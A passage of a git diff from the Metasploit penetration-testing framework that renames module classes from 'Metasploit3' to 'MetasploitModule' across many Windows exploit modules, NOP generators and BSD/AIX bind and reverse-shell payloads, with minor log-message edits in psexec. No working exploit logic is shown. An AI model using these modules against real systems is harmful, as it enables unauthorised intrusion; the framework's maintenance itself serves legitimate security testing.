'msf/windows_error' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 780604be72..9aa9a57d6e 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index b9c0a1baea..8796ac8402 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 362dd6e87d..d9a46e9b37 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin psexec(command) rescue StandardError => exec_command_error diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 0c45d00c83..1c912acdfa 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Exploit mixins should be called first @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Module::Deprecated - deprecated(Date.new(2016, 1, 1), 'exploit/windows/smb/psexec') + deprecated(Date.new(2016, 4, 30), 'exploit/windows/smb/psexec') def initialize(info = {}) super(update_info(info, @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin return psexec(command) rescue StandardError => exec_command_error diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 869aa183ff..8f97d7ca0c 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -19,7 +19,7 @@ under: require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Server diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index ceea4829b0..c7f1e9259d 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 07925d6526..05e183e82e 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 27ac045d5b..36eba8502e 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 3fbf61a555..d045492849 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index bbf06483f1..adcc1d5461 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 6d393979a1..6f91626838 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 3b8450c140..a0b88194a5 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index d851559c2c..922a163785 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index e53bb028ea..07333700de 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 57e154860a..4204c26d58 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 73b305f2a4..117a781436 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index df985f1448..fd8cfaf959 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 4f9dde83ce..344a6e8ba6 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 9a437f9cab..278eebb500 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 3106ce456d..4f7ccaf5fc 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index ea55e3c541..05787a086f 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 9f54353a9c..5e870c2a45 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb index 49588e2655..117490b420 100644 --- a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index c8d78b0862..1809d64ee3 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 410c818099..27117793e5 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb index 0e3e0d5811..935f681953 100644 --- a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/opentftp_error_code.rb b/modules/exploits/windows/tftp/opentftp_error_code.rb index 0949f8ff23..fa1734b983 100644 --- a/modules/exploits/windows/tftp/opentftp_error_code.rb +++ b/modules/exploits/windows/tftp/opentftp_error_code.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 2183c12283..57e3bfa02b 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 119de0ce1a..62659e76db 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 75131b6e09..436e4b922e 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb index 3cbd5bf1d0..b1ac37baa9 100644 --- a/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb +++ b/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb index a02cbb277c..5af0ab3918 100644 --- a/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb +++ b/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 4a673fd767..3616ae558c 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index a479580f78..aa4f88043f 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 4fd21103e0..9b513c571a 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 2822427e85..6ed96a1fab 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 26bb1236d2..b632b9c800 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -6,7 +6,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 24c94599c7..d6edf7d1fe 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 71d8a1c447..ca878da289 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::WinRM diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 4d7028f656..c47f62277d 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index a2ba2e1f56..2470ee3f38 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for ARM (little endian) # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 0498fd6817..272d16448c 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for PHP payloads # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 73e0f0f4ed..8517b9dc33 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for PowerPC # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 6227cf4c38..c88aaa81df 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements NOP generator for the SPARC platform # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop # Nop types InsSethi = 0 diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 26f9189a55..1e6a2b501e 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for TTY payloads # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 765a636309..8af416a2d5 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index d45d90434e..609a618615 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -17,7 +17,7 @@ require 'rex/nop/opty2' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop def initialize super( diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3607aa361f..4b0242cbb0 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -13,7 +13,7 @@ require 'msf/core' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class MetasploitModule < Msf::Nop SINGLE_BYTE_SLED = { @@ -106,7 +106,7 @@ SINGLE_BYTE_SLED = # Did someone specify random NOPs in the environment? if (!random and datastore['RandomNops']) - random = (datastore['RandomNops'].match(/true|1|y/i) != nil) + random = datastore['RandomNops'] end # Generate the whole sled... diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index a1b09fcc1c..7e48e83f2d 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 264 diff --git a/modules/payloads/singles/aix/ppc/shell_find_port.rb b/modules/payloads/singles/aix/ppc/shell_find_port.rb index 10f3ca4167..0b7e38ba16 100644 --- a/modules/payloads/singles/aix/ppc/shell_find_port.rb +++ b/modules/payloads/singles/aix/ppc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 220 diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 24832f647c..ac97edec4e 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_shell' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 56 diff --git a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb index 44c3fe9367..ef6c85201a 100644 --- a/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 204 diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb index f4f42719c9..06b08fb63e 100644 --- a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 164 diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb index 1143cf23b8..1df2e6ee8d 100644 --- a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 128 diff --git a/modules/payloads/singles/bsd/x64/exec.rb b/modules/payloads/singles/bsd/x64/exec.rb index 150d96f356..973ae31ab4 100644 --- a/modules/payloads/singles/bsd/x64/exec.rb +++ b/modules/payloads/singles/bsd/x64/exec.rb @@ -15,7 +15,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 31 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb index c6a5ff3f38..6c0d2ee0fc 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb index 9528c88233..cbfe962089 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index 8d92cadcb6..8bff2170e3 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 88 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb index 368d6f9666..0c4d3612ff 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 105 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb index fece7de959..490f67d140 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 108 diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb index 98ef6fb778..77b0e61099 100644 --- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 81 diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index eee7aebbd9..d95199cebd 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ 